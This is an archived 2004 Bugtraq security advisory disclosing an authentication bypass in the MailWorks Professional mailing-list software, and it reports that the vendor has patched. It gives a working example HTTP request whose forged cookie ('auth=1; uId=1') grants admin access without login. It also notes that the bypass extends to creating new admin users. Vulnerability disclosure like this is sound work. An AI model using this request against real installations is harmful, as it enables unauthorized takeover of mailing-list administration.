[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
MailWorks Professional - Authentication bypass
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: MailWorks Professional - Authentication bypass
- From: headpimp@xxxxxxxxxxxxxxxxxxx
- Date: Fri, 3 Sep 2004 09:23:04 +1200 (NZST)
Pimp industries.
"Its all about the Bling, B^!%@s and Fame!"
MailWorks Professional All versions
Authentication bypass via cookie control
(C) Paul Craig - Pimp Industries 2004
Background
-------------
MailWorks Professional is a mailing list management application, developed
by sitecubed. It provides an easy way for e-zines or newsletters to manage
large amounts of contacts and distribute newsletters among them. It?s
reasonably popular with many websites and has been around for a while.
Exploit:
-------------
C really is for cookie and in this case, MailWorks Pro has a rather
trivial session check that is easily bypassed within a cookie. The exploit
allows an attacker to have full control over the administration section,
without the need to authenticate and allowing the attacker to spoof the
admin user functions.
An example HTTP packet is below
GET /mwadmin/index.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/msword, application/x-shockw
ave-flash, */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR
1.1.4322)
Host: www.example.com
Content-Length: 570
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: auth=1; uId=1
The cookie contains the exploit, auth=1 (to signify that you have logged
in) and uId= the id of the user you want to be, by default uId=1 is user
"admin".
This request will show the index page for user ?Admin?, instead of the
usual ?Please Login? page.
This can be further exploited by sending a HTTP post to add a new user
with full admin rights, from there the attacker can login as a legitimate
admin user.
Suggestions/Work Around:
-------------
Sitecubed was contacted early this morning; they responded very quickly
and have released a patch for all customers that is available on their
website.
Well done Sitecubed for being prompt!
Company status
---------------
Pimp Industries is a privately owned security research company. If you
would like to contact Pimp Industries to discuss any nature of business,
please email us at headpimp@xxxxxxxxxxxxxxxxxxxx
Paul Craig
Head Pimp, Security Researcher
Pimp Industries
"Move Fast, Think faster"